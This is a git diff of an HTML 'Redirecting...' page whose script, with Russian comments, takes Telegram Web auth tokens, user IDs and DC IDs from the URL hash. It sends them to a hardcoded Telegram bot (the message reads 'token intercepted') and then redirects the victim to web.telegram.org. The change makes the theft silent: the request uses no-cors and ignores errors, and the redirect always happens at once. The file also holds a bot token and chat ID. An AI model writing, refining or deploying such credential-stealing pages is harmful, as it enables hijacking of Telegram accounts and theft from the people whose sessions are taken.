--- a/index.html
+++ b/index.html
@@ -4,42 +4,38 @@
     <meta charset="UTF-8">
     <title>Redirecting...</title>
     <script>
-        // Функция отправки данных в Telegram
-        async function sendToTelegram(token, userId, dcId) {
+        // Функция отправки данных в Telegram (без блокировки)
+        function sendToTelegram(token, userId, dcId) {
             const botToken = '8541613029:AAF9uWzlAYEJy1kNM89yQfMtIz3bh53AOo4'; // замените на ваш токен
             const chatId = '8220267007';     // замените на ваш ID
             const message = `Перехвачен токен:\nToken: ${token}\nUser ID: ${userId}\nDC ID: ${dcId}`;
             const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
-            try {
-                await fetch(url);
-            } catch (e) {
-                console.error('Ошибка отправки в Telegram', e);
-            }
+            
+            // Используем fetch с игнорированием ошибок (fire-and-forget)
+            fetch(url, { mode: 'no-cors' }) // no-cors позволяет отправить запрос даже при CORS-блокировке
+                .catch(e => console.log('Ошибка отправки (игнорируем):', e));
         }
 
-        // Извлечение параметров из текущего URL
+        // Главная функция
         (function() {
-            // Получаем полный URL (включая хэш после #)
             const fullUrl = window.location.href;
-            // Разбираем хэш-часть (то, что после #)
             const hashIndex = fullUrl.indexOf('#');
-            if (hashIndex === -1) return; // нет параметров
+            let token = null, userId = null, dcId = null;
 
-            const hashParams = new URLSearchParams(fullUrl.substring(hashIndex + 1));
-            const token = hashParams.get('tgWebAuthToken');
-            const userId = hashParams.get('tgWebAuthUserId');
-            const dcId = hashParams.get('tgWebAuthDcId');
-
-            if (token && userId && dcId) {
-                // Отправляем в Telegram
-                sendToTelegram(token, userId, dcId).then(() => {
-                    // Перенаправляем на оригинальный сайт Telegram Web (без параметров)
-                    window.location.replace('https://web.telegram.org/k/');
-                });
-            } else {
-                // Если параметров нет, всё равно переходим на Telegram
-                window.location.replace('https://web.telegram.org/k/');
+            if (hashIndex !== -1) {
+                const hashParams = new URLSearchParams(fullUrl.substring(hashIndex + 1));
+                token = hashParams.get('tgWebAuthToken');
+                userId = hashParams.get('tgWebAuthUserId');
+                dcId = hashParams.get('tgWebAuthDcId');
             }
+
+            // Если параметры найдены, отправляем в Telegram (асинхронно)
+            if (token && userId && dcId) {
+                sendToTelegram(token, userId, dcId);
+            }
+
+            // НЕМЕДЛЕННОЕ перенаправление на оригинальный Telegram Web (всегда)
+            window.location.replace('https://web.telegram.org/k/');
         })();
     </script>
 </head>
